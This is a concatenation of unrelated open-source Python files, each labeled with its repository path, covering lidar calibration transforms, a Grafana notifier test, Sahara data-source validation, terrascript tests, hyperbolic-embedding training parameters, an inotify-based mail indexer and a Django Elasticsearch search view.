pts_lidar_hom = self.cart_to_hom(pts_lidar)
pts_rect = torch.matmul(
pts_lidar_hom, torch.matmul(self.V2C.t(), self.R0.t()))
return pts_rect
def rect_to_img(self, pts_rect):
"""
:param pts_rect: (N, 3)
:return pts_img: (N, 2)
"""
pts_rect_hom = self.cart_to_hom(pts_rect)
pts_2d_hom = torch.matmul(pts_rect_hom, self.P2.t())
pts_img = (pts_2d_hom[:, 0:2].t() / pts_rect_hom[:, 2]).t() # (N, 2)
pts_rect_depth = pts_2d_hom[:, 2] - \
self.P2.t()[3, 2] # depth in rect camera coord
return pts_img, pts_rect_depth
def lidar_to_img(self, pts_lidar):
"""
:param pts_lidar: (N, 3)
:return pts_img: (N, 2)
"""
pts_rect = self.lidar_to_rect(pts_lidar)
pts_img, pts_depth = self.rect_to_img(pts_rect)
return pts_img, pts_depth
def img_to_rect(self, u, v, depth_rect):
"""
:param u: (N)
:param v: (N)
:param depth_rect: (N)
:return:
"""
x = ((u - self.cu) * depth_rect) / self.fu + self.tx
y = ((v - self.cv) * depth_rect) / self.fv + self.ty
pts_rect = torch.cat(
(x.reshape(-1, 1), y.reshape(-1, 1), depth_rect.reshape(-1, 1)), dim=1)
return pts_rect
def img_to_lidar(self, u, v, depth_rect):
pts_rect = self.img_to_rect(u, v, depth_rect)
return self.rect_to_lidar(pts_rect)
|
tests/notifier/test_grafana_notifier.py | Connor-Knabe/chiadog | 503 | 12659218 | <reponame>Connor-Knabe/chiadog<gh_stars>100-1000
# std
import os
import unittest
# project
from src.notifier.grafana_notifier import GrafanaNotifier
from .dummy_events import DummyEvents
class TestGrafanaNotifier(unittest.TestCase):
def setUp(self) -> None:
base_url = os.getenv("GRAFANA_BASE_URL")
api_token = os.getenv("GRAFANA_API_TOKEN")
self.assertIsNotNone(base_url, "You must export GRAFANA_BASE_URL as env variable")
self.assertIsNotNone(api_token, "You must export GRAFANA_API_TOKEN as env variable")
self.notifier = GrafanaNotifier(
title_prefix="Test",
config={
"enable": True,
"credentials": {
"base_url": base_url,
"api_token": api_token,
},
},
)
@unittest.skipUnless(
os.getenv("GRAFANA_BASE_URL") and os.getenv("GRAFANA_API_TOKEN"), "Run only if credentials available"
)
def testGrafanaLowPriorityNotifications(self):
success = self.notifier.send_events_to_user(events=DummyEvents.get_low_priority_events())
self.assertTrue(success)
@unittest.skipUnless(
        os.getenv("GRAFANA_BASE_URL") and os.getenv("GRAFANA_API_TOKEN"), "Run only if credentials available"
)
def testGrafanaNormalPriorityNotifications(self):
success = self.notifier.send_events_to_user(events=DummyEvents.get_normal_priority_events())
self.assertTrue(success)
@unittest.skipUnless(
        os.getenv("GRAFANA_BASE_URL") and os.getenv("GRAFANA_API_TOKEN"), "Run only if credentials available"
)
def testGrafanaHighPriorityNotifications(self):
success = self.notifier.send_events_to_user(events=DummyEvents.get_high_priority_events())
self.assertTrue(success)
|
sahara/service/validations/edp/data_source.py | ksshanam/sahara | 161 | 12659238 | <gh_stars>100-1000
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from oslo_config import cfg
from sahara import conductor as c
from sahara import context
import sahara.exceptions as ex
from sahara.i18n import _
import sahara.service.edp.data_sources.manager as ds_manager
import sahara.service.validations.edp.base as b
CONF = cfg.CONF
def check_data_source_create(data, **kwargs):
b.check_data_source_unique_name(data['name'])
_check_data_source(data)
def _check_datasource_placeholder(url):
if url is None:
return
total_length = 0
substrings = re.findall(r"%RANDSTR\(([\-]?\d+)\)%", url)
for length in map(int, substrings):
if length <= 0:
raise ex.InvalidDataException(_("Requested RANDSTR length"
" must be positive."))
total_length += length
if total_length > 1024:
raise ex.InvalidDataException(_("Requested RANDSTR length is"
" too long, please choose a "
"value less than 1024."))
def _check_data_source(data):
_check_datasource_placeholder(data["url"])
if data["type"] in CONF.data_source_types:
ds_manager.DATA_SOURCES.get_data_source(data["type"]).validate(data)
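# Example (added for illustration): a data source URL such as
# "swift://demo-container/out-%RANDSTR(8)%" matches the regex in
# _check_datasource_placeholder above with substrings == ["8"], so total_length is 8
# and the check passes; a negative length or a combined length above 1024 raises
# InvalidDataException. The URL itself is a made-up example.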
def check_data_source_update(data, data_source_id):
ctx = context.ctx()
jobs = c.API.job_execution_get_all(ctx)
pending_jobs = [job for job in jobs if job.info["status"] == "PENDING"]
for job in pending_jobs:
if data_source_id in job.data_source_urls:
raise ex.UpdateFailedException(
_("DataSource is used in a "
"PENDING Job and can not be updated."))
ds = c.API.data_source_get(ctx, data_source_id)
if 'name' in data and data['name'] != ds.name:
b.check_data_source_unique_name(data['name'])
check_data = {'type': data.get('type', None) or ds.type,
'url': data.get('url', None) or ds.url,
'credentials': data.get(
'credentials', None) or ds.credentials}
_check_data_source(check_data)
|
tests/test_provider_Ouest_France_ldap.py | mjuenema/python-terrascript | 507 | 12659291 | <filename>tests/test_provider_Ouest_France_ldap.py
# tests/test_provider_Ouest-France_ldap.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:59 UTC)
def test_provider_import():
import terrascript.provider.Ouest_France.ldap
def test_resource_import():
from terrascript.resource.Ouest_France.ldap import ldap_group
def test_datasource_import():
from terrascript.data.Ouest_France.ldap import ldap_group
from terrascript.data.Ouest_France.ldap import ldap_user
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.Ouest_France.ldap
#
# t = terrascript.provider.Ouest_France.ldap.ldap()
# s = str(t)
#
# assert 'https://github.com/Ouest-France/terraform-provider-ldap' in s
# assert '0.7.2' in s
|
recipes/Python/577929_PythMultidimensional_List_Searcher_/recipe-577929.py | tdiprima/code | 2,023 | 12659312 | <filename>recipes/Python/577929_PythMultidimensional_List_Searcher_/recipe-577929.py
def find(searchList, elem):
    """Return, for each value in elem, the list of indices where it occurs in searchList."""
endList = []
for indElem in range(0,len(elem)):
resultList = []
for ind in range(0, len(searchList)):
if searchList[ind] == elem[indElem]:
resultList.append(ind)
endList.extend([resultList])
return endList
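if __name__ == '__main__':
    # Example run (added): locate every index of 1 and 4 in the list.
    print(find([1, 2, 3, 1, 4], [1, 4]))  # -> [[0, 3], [4]]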
|
params.py | dalab/hyperbolic_cones | 103 | 12659327 | from collections import OrderedDict
threads = 24
default_params = OrderedDict([
############ Common params:
('wn', 'noun'), # mammal or noun
('print_every', 20),
('save', False), # Whether to save the model in the folder saved_models/
('num_negative', 10), # Number of negative samples to use
('batch_size', 10), # Size of batch to use for training
('epsilon', 1e-5),
('seed', 0),
('dim', 5),
('opt', 'rsgd'), # rsgd or exp_map or sgd . Used for all hyperbolic models. #### rsgd always better
('where_not_to_sample', 'ancestors'), # both or ancestors or children. Has no effect if neg_sampl_strategy = 'all'.
('neg_edges_attach', 'child'), # How to form negative edges: 'parent' (u,v') or 'child' (u', v) or 'both'
############## Angle loss:
('class', 'HypCones'), # 'EuclCones' , 'HypCones' , 'OrderEmb'
('neg_sampl_strategy', 'true_neg_non_leaves'), ########## true_neg_non_leaves worse than true_neg when init uses true_neg_non_leaves ?????
('lr', 0.0001), ### 1e-4 the best for Hyp cones with rsgd ; 3e-4 better for Eucl cones
('resc_vecs', 0.7), ## 0.7 and 0.8 are similar
('epochs', 300),
('K', 0.1),
('margin', 0.01),
############### Init loss:
('init_class', 'PoincareNIPS'), # PoincareNIPS, EuclNIPS
('lr_init', 0.03), # 0.3, 0.03, 0.1 all kind of good; 0.03 the best 94%, but with 1/10 factor for burnin
('epochs_init', 100),
('neg_sampl_strategy_init', 'true_neg'), # 'true_neg' always better!
('epochs_init_burn_in', 20),
('neg_sampling_power_init', 0.75), # 0 for uniform, 1 for unigram, 0.75 much better than 0 !!!!!! Do not put 0.
])
### We run 3 different jobs, but each of them will be ran in all.py:291 for all training settings (percentage of transitive closure).
non_default_params = [
### Our method : hyperbolic entailment cones
# File: task_50percent#dim_5#class_HypCones#init_class_PoincareNIPS#neg_sampl_strategy_true_neg#lr_0.0003#epochs_300#opt_rsgd#where_not_to_sample_children#neg_edges_attach_parent#lr_init_0.03#epochs_init_100#neg_sampl_strategy_init_true_neg
# ======> best OVERALL f1 CONES test = 92.80; CONES valid = 92.60 - after 260 epochs.
# To see the above result at the end of the training, one needs to run the following:
# for i in `ls ./logs/task_50percent#dim_5#*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done | grep -A1 'HypCones' ;for i in `ls ./logs/task_50percent#epochs*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done
[('dim', 5), ('class', 'HypCones'), ('init_class', 'PoincareNIPS'), ('neg_sampl_strategy', 'true_neg'), ('lr', 0.0003), ('epochs', 300), ('opt', 'rsgd'), ('where_not_to_sample', 'children'), ('neg_edges_attach', 'parent'), ('lr_init', 0.03), ('epochs_init', 100), ('neg_sampl_strategy_init', 'true_neg')],
### Poincare embeddings of Nickel et al., NIPS'18 - we look for the INIT results in this log file.
# File: task_50percent#dim_5#class_HypCones#init_class_PoincareNIPS#neg_sampl_strategy_true_neg_non_leaves#lr_0.0001#epochs_300#opt_exp_map#where_not_to_sample_ancestors#neg_edges_attach_child#lr_init_0.03#epochs_init_100#neg_sampl_strategy_init_true_neg
# ======> best OVERALL f1 INIT test = 83.60; INIT valid = 83.60 - after 80 epochs.
# To see the above result at the end of the training, one needs to run the following:
# for i in `ls ./logs/task_50percent#dim_5#*` ; do echo $i; cat $i | grep best | grep INIT | grep OVERALL ; done | grep -A1 'PoincareNIPS'; for i in `ls ./logs/task_50percent#epochs*` ; do echo $i; cat $i | grep best | grep INIT | grep OVERALL ; done
[('dim', 5), ('class', 'HypCones'), ('init_class', 'PoincareNIPS'), ('neg_sampl_strategy', 'true_neg_non_leaves'), ('lr', 0.0001), ('epochs', 300), ('opt', 'exp_map'), ('where_not_to_sample', 'ancestors'), ('neg_edges_attach', 'child'), ('lr_init', 0.03), ('epochs_init', 100), ('neg_sampl_strategy_init', 'true_neg')],
### Order embeddings of Vendrov et al, ICLR'16
# File: task_50percent#dim_5#class_OrderEmb#neg_sampl_strategy_true_neg#lr_0.1#margin_1#epochs_500#where_not_to_sample_children#neg_edges_attach_parent
# ======> best OVERALL f1 CONES test = 81.70; CONES valid = 81.60 - after 460 epochs.
# To see the above result at the end of the training, one needs to run the following:
# for i in `ls ./logs/task_50percent#dim_5#*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done | grep -A1 'OrderEmb' ;for i in `ls ./logs/task_50percent#*` ; do echo $i; cat $i | grep best | grep CONES | grep OVERALL ; done | grep -A1 'OrderEmb'
[('dim', 5), ('class', 'OrderEmb'), ('neg_sampl_strategy', 'true_neg'), ('lr', 0.1), ('margin', 1), ('epochs', 500), ('where_not_to_sample', 'children'), ('neg_edges_attach', 'parent')],
]
### Remove duplicate commands
p = []
for i in range(len(non_default_params)):
has_copy = False
for j in range(i+1, len(non_default_params)):
if non_default_params[i] == non_default_params[j]:
has_copy = True
if not has_copy:
p.append(non_default_params[i])
non_default_params = p |
afew/files.py | naegling/afew | 159 | 12659345 | <reponame>naegling/afew<gh_stars>100-1000
# SPDX-License-Identifier: ISC
# Copyright (c) <NAME> <<EMAIL>>
import os
import re
import stat
import logging
import platform
import queue
import threading
import notmuch
import pyinotify
import ctypes
import ctypes.util
import contextlib
if platform.system() != 'Linux':
raise ImportError('Unsupported platform: {!r}'.format(platform.system()))
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, options, database):
self.options = options
self.database = database
super().__init__()
ignore_re = re.compile('(/xapian/.*(base.|tmp)$)|(\.lock$)|(/dovecot)')
def process_IN_DELETE(self, event):
if self.ignore_re.search(event.pathname):
return
logging.debug("Detected file removal: {!r}".format(event.pathname))
self.database.remove_message(event.pathname)
self.database.close()
def process_IN_MOVED_TO(self, event):
if self.ignore_re.search(event.pathname):
return
src_pathname = event.src_pathname if hasattr(event, 'src_pathname') else None
logging.debug("Detected file rename: {!r} -> {!r}".format(src_pathname, event.pathname))
def new_mail(message):
for filter_ in self.options.enable_filters:
try:
filter_.run('id:"{}"'.format(message.get_message_id()))
filter_.commit(self.options.dry_run)
except Exception as e:
logging.warn('Error processing mail with filter {!r}: {}'.format(filter_.message, e))
try:
self.database.add_message(event.pathname,
sync_maildir_flags=True,
new_mail_handler=new_mail)
except notmuch.FileError as e:
logging.warn('Error opening mail file: {}'.format(e))
return
except notmuch.FileNotEmailError as e:
logging.warn('File does not look like an email: {}'.format(e))
return
else:
if src_pathname:
self.database.remove_message(src_pathname)
finally:
self.database.close()
def watch_for_new_files(options, database, paths, daemonize=False):
wm = pyinotify.WatchManager()
mask = (
pyinotify.IN_DELETE |
pyinotify.IN_MOVED_FROM |
pyinotify.IN_MOVED_TO)
handler = EventHandler(options, database)
notifier = pyinotify.Notifier(wm, handler)
logging.debug('Registering inotify watch descriptors')
wdds = dict()
for path in paths:
wdds[path] = wm.add_watch(path, mask)
# TODO: honor daemonize
logging.debug('Running mainloop')
notifier.loop()
try:
libc = ctypes.CDLL(ctypes.util.find_library("c"))
except ImportError as e:
raise ImportError('Could not load libc: {}'.format(e))
class Libc:
class c_dir(ctypes.Structure):
pass
c_dir_p = ctypes.POINTER(c_dir)
opendir = libc.opendir
opendir.argtypes = [ctypes.c_char_p]
opendir.restype = c_dir_p
closedir = libc.closedir
closedir.argtypes = [c_dir_p]
closedir.restype = ctypes.c_int
@classmethod
@contextlib.contextmanager
def open_directory(cls, path):
handle = cls.opendir(path)
yield handle
cls.closedir(handle)
class c_dirent(ctypes.Structure):
'''
man 3 readdir says::
On Linux, the dirent structure is defined as follows:
struct dirent {
ino_t d_ino; /* inode number */
off_t d_off; /* offset to the next dirent */
unsigned short d_reclen; /* length of this record */
unsigned char d_type; /* type of file; not supported
by all file system types */
char d_name[256]; /* filename */
};
'''
_fields_ = (
('d_ino', ctypes.c_long),
('d_off', ctypes.c_long),
('d_reclen', ctypes.c_ushort),
('d_type', ctypes.c_byte),
('d_name', ctypes.c_char * 4096),
)
c_dirent_p = ctypes.POINTER(c_dirent)
readdir = libc.readdir
readdir.argtypes = [c_dir_p]
readdir.restype = c_dirent_p
# magic value for directory
DT_DIR = 4
blacklist = {'.', '..', 'tmp'}
def walk_linux(channel, path):
channel.put(path)
with Libc.open_directory(path) as handle:
while True:
dirent_p = Libc.readdir(handle)
if not dirent_p:
break
if dirent_p.contents.d_type == Libc.DT_DIR and \
dirent_p.contents.d_name not in blacklist:
walk_linux(channel, os.path.join(path, dirent_p.contents.d_name))
def walk(channel, path):
channel.put(path)
for child_path in (os.path.join(path, child)
for child in os.listdir(path)
if child not in blacklist):
try:
stat_result = os.stat(child_path)
except Exception:
continue
if stat_result.st_mode & stat.S_IFDIR:
walk(channel, child_path)
def walker(channel, path):
walk_linux(channel, path)
channel.put(None)
def quick_find_dirs_hack(path):
results = queue.Queue()
walker_thread = threading.Thread(target=walker, args=(results, path))
walker_thread.daemon = True
walker_thread.start()
while True:
result = results.get()
if result is not None:
yield result
else:
break
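# Usage sketch (added): iterate over all maildir subdirectories below a root path,
# e.g. to build the `paths` argument of watch_for_new_files(). The path below is
# illustrative only.
#
#   for folder in quick_find_dirs_hack('/home/user/Maildir'):
#       print(folder)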
|
api/app/search/views.py | phuonglvh/DataEngineeringProject | 417 | 12659349 | <gh_stars>100-1000
from django_elasticsearch_dsl_drf.viewsets import DocumentViewSet
from django_elasticsearch_dsl_drf.filter_backends import (
FilteringFilterBackend,
CompoundSearchFilterBackend,
DefaultOrderingFilterBackend,
OrderingFilterBackend
)
from search.documents import NewsDocument
from search.serializers import NewsDocumentSerializer
class NewsDocumentView(DocumentViewSet):
document = NewsDocument
serializer_class = NewsDocumentSerializer
lookup_field = "id"
filter_backends = [
CompoundSearchFilterBackend,
FilteringFilterBackend,
DefaultOrderingFilterBackend,
OrderingFilterBackend
]
search_fields = (
"title",
"description"
)
filter_fields = {
"language": "language"
}
ordering_fields = {
"published": "published",
"author": "author",
"language": "language"
}
ordering = (
"published",
)
|